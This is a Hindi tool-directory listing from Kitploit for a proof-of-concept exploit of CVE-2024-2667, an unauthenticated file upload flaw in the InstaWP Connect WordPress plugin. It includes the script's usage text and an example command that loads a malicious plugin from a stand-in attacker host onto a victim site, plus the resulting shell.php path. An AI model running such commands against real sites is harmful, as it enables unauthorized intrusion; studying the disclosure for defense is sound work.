Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-2667-Poc — CVE-2024-2667 के लिए PoC एक्सप्लॉइट: InstaWP Connect WordPress प्लगइन REST API एंडपॉइंट में अपर्याप्त फ़ाइल सत्यापन के माध्यम से स्वचालित मनमाना फ़ाइल अपलोड और शेल एक्सेस। | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2024-2667-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubnxploited/cve-2024-2667-poc

CVE-2024-2667-Poc

CVE-2024-2667 के लिए PoC एक्सप्लॉइट: InstaWP Connect WordPress प्लगइन REST API एंडपॉइंट में अपर्याप्त फ़ाइल सत्यापन के माध्यम से स्वचालित मनमाना फ़ाइल अपलोड और शेल एक्सेस।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-2667-Poc 🚀

विवरण

WordPress के लिए InstaWP Connect – 1-click WP Staging & Migration प्लगइन, /wp-json/instawp-connect/v1/config REST API एंडपॉइंट में अपर्याप्त फ़ाइल सत्यापन के कारण 0.1.0.22 तक के सभी संस्करणों में मनमानी फ़ाइल अपलोड के प्रति संवेदनशील है। यह बिना प्रमाणीकरण वाले हमलावरों के लिए मनमानी फ़ाइलें अपलोड करना संभव बनाता है।

स्क्रिप्ट उपयोग गाइड ⚙️

इंस्टॉलेशन आवश्यकताएँ

विवरणजानकारीआइकन
आवश्यक लाइब्रेरी इंस्टॉल करेंआवश्यक Python लाइब्रेरी इंस्टॉल करने के लिए pip का उपयोग करें: requests और beautifulsoup4।🛠️
इंस्टॉल करने का कमांडचलाएँ: pip install requests beautifulsoup4।📥

स्क्रिप्ट चलाएँ

भेद्यता जाँचें

शेल स्थान

विवरणजानकारीआइकन
शेल पथयदि अपलोड सफल होता है, तो शेल यहाँ उपलब्ध होगा:🐚
wp-content/plugins/instawp-connect/shell.php.

उपयोग -help

root@kitploit:~
usage: CVE-2024-2667.py [-h] -up URL_PLUGIN -u URL_TARGET

The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due
to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and
including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.

options:
  -h, --help            show this help message and exit
  -up URL_PLUGIN, --url_plugin URL_PLUGIN
                        URL of the plugin (e.g., http://attacker-domain/malicious-plugin.zip).
  -u URL_TARGET, --url_target URL_TARGET
                        URL of the target WordPress site (e.g., http://victim-domain/).
टूल डाउनलोड करें
विवरणजानकारीआइकन
स्क्रिप्ट निष्पादित करेंआवश्यक तर्कों के साथ कमांड लाइन का उपयोग करके स्क्रिप्ट चलाएँ।🚀
आवश्यक तर्क- -up: प्लगइन URL (जैसे, http://attacker-domain/malicious-plugin.zip)।
- -u: लक्षित WordPress URL (जैसे, http://victim-domain/)।🔧
उदाहरण कमांडpython CVE-2024-2667.py -up http://attacker-domain/malicious-plugin.zip -u http://victim-domain/📜
विवरणजानकारीआइकन
संस्करण जाँचस्क्रिप्ट लक्षित प्लगइन के संस्करण के लिए readme.txt फ़ाइल की जाँच करती है।🔍
संवेदनशील संस्करणयदि संस्करण <= 0.1.0.22 है, तो स्क्रिप्ट प्रिंट करती है: The site is vulnerable.⚠️
सुरक्षित संस्करणयदि संस्करण > 0.1.0.22 है, तो स्क्रिप्ट प्रिंट करती है: The site is not vulnerable.✅